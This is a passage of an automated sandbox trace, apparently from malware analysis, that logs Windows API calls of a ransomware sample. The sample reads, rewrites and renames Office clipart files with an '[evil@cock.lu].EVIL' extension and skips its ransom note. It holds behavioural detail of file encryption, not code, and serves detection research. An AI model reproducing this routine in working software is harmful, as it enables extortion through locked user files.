office\\root\\clipart\\pub60cor\\ag00139_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0106.507] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x296f, lpOverlapped=0x0) returned 1 [0106.519] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.519] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.519] _errno () returned 0x84b1160840 [0106.519] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.519] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2980, lpOverlapped=0x0) returned 1 [0106.520] CloseHandle (hObject=0x1a8) returned 1 [0106.520] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.520] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.520] __uncaught_exception () returned 0x84b1160800 [0106.520] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.520] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif.[evil@cock.lu].evil")) returned 1 [0106.521] ??_V@YAXPEAX@Z () returned 0x1 [0106.525] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF", dwFileAttributes=0x200) returned 0 [0106.525] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0106.525] wcsstr (_Str="AG00142_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0106.525] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 69 [0106.525] wcscmp (_String1="AG00142_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0106.525] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00142_.GIF") returned 0x0 [0106.525] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 0x45 [0106.525] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0106.527] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3bcc, lpOverlapped=0x0) returned 1 [0106.532] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.532] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.532] _errno () returned 0x84b1160840 [0106.533] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.533] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x3be0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3be0, lpOverlapped=0x0) returned 1 [0106.533] CloseHandle (hObject=0x1a8) returned 1 [0106.533] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.533] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.533] __uncaught_exception () returned 0x84b1160800 [0106.533] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.534] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif.[evil@cock.lu].evil")) returned 1 [0106.534] ??_V@YAXPEAX@Z () returned 0x1 [0106.538] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF", dwFileAttributes=0x200) returned 0 [0106.538] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0106.538] wcsstr (_Str="AG00154_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0106.538] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 69 [0106.538] wcscmp (_String1="AG00154_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0106.538] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00154_.GIF") returned 0x0 [0106.538] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 0x45 [0106.538] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0106.540] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x14c3, lpOverlapped=0x0) returned 1 [0106.735] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.735] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.735] _errno () returned 0x84b1160840 [0106.735] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.736] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x14e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x14e0, lpOverlapped=0x0) returned 1 [0106.736] CloseHandle (hObject=0x1a8) returned 1 [0106.736] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.736] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.736] __uncaught_exception () returned 0x84b1160800 [0106.736] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.737] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif.[evil@cock.lu].evil")) returned 1 [0106.737] ??_V@YAXPEAX@Z () returned 0x1 [0106.741] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF", dwFileAttributes=0x200) returned 0 [0106.741] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0106.741] wcsstr (_Str="AG00157_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0106.741] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 69 [0106.741] wcscmp (_String1="AG00157_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0106.741] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00157_.GIF") returned 0x0 [0106.741] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 0x45 [0106.741] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0106.743] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x135b, lpOverlapped=0x0) returned 1 [0106.765] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.766] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.766] _errno () returned 0x84b1160840 [0106.766] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.766] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1360, lpOverlapped=0x0) returned 1 [0106.766] CloseHandle (hObject=0x1a8) returned 1 [0106.766] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.766] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.766] __uncaught_exception () returned 0x84b1160800 [0106.766] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.766] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif.[evil@cock.lu].evil")) returned 1 [0106.767] ??_V@YAXPEAX@Z () returned 0x1 [0106.770] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF", dwFileAttributes=0x200) returned 0 [0106.770] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0106.770] wcsstr (_Str="AG00158_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0106.770] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 69 [0106.770] wcscmp (_String1="AG00158_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0106.770] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00158_.GIF") returned 0x0 [0106.770] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 0x45 [0106.770] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0106.772] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x13a6, lpOverlapped=0x0) returned 1 [0106.785] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.785] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.785] _errno () returned 0x84b1160840 [0106.785] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.785] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x13c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x13c0, lpOverlapped=0x0) returned 1 [0106.785] CloseHandle (hObject=0x1a8) returned 1 [0106.785] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.785] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.785] __uncaught_exception () returned 0x84b1160800 [0106.785] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.786] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif.[evil@cock.lu].evil")) returned 1 [0106.786] ??_V@YAXPEAX@Z () returned 0x1 [0106.789] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF", dwFileAttributes=0x200) returned 0 [0106.789] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0106.789] wcsstr (_Str="AG00160_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0106.789] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 69 [0106.789] wcscmp (_String1="AG00160_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0106.789] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00160_.GIF") returned 0x0 [0106.789] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 0x45 [0106.789] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0106.791] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x47a, lpOverlapped=0x0) returned 1 [0106.816] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.816] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.816] _errno () returned 0x84b1160840 [0106.817] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.817] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x480, lpOverlapped=0x0) returned 1 [0106.817] CloseHandle (hObject=0x1a8) returned 1 [0106.817] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.817] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.817] __uncaught_exception () returned 0x84b1160800 [0106.817] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.817] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif.[evil@cock.lu].evil")) returned 1 [0106.818] ??_V@YAXPEAX@Z () returned 0x1 [0106.821] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF", dwFileAttributes=0x200) returned 0 [0106.821] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0106.821] wcsstr (_Str="AG00161_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0106.821] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 69 [0106.821] wcscmp (_String1="AG00161_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0106.821] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00161_.GIF") returned 0x0 [0106.821] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 0x45 [0106.821] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0106.822] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1d9f, lpOverlapped=0x0) returned 1 [0106.834] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.834] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.834] _errno () returned 0x84b1160840 [0106.834] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.834] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x1da0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1da0, lpOverlapped=0x0) returned 1 [0106.835] CloseHandle (hObject=0x1a8) returned 1 [0106.835] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.835] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.835] __uncaught_exception () returned 0x84b1160800 [0106.835] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.835] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif.[evil@cock.lu].evil")) returned 1 [0106.836] ??_V@YAXPEAX@Z () returned 0x1 [0106.838] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF", dwFileAttributes=0x200) returned 0 [0106.839] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0106.839] wcsstr (_Str="AG00163_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0106.839] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 69 [0106.839] wcscmp (_String1="AG00163_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0106.839] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00163_.GIF") returned 0x0 [0106.839] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 0x45 [0106.839] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0106.841] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1b48, lpOverlapped=0x0) returned 1 [0106.843] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.843] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.843] _errno () returned 0x84b1160840 [0106.843] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.843] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1b60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b60, lpOverlapped=0x0) returned 1 [0106.843] CloseHandle (hObject=0x1a8) returned 1 [0106.843] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.843] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.843] __uncaught_exception () returned 0x84b1160800 [0106.844] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.844] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif.[evil@cock.lu].evil")) returned 1 [0106.844] ??_V@YAXPEAX@Z () returned 0x1 [0106.847] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF", dwFileAttributes=0x200) returned 0 [0106.847] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0106.847] wcsstr (_Str="AG00164_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0106.847] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 69 [0106.847] wcscmp (_String1="AG00164_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0106.847] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00164_.GIF") returned 0x0 [0106.847] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 0x45 [0106.847] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0106.849] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x33c6, 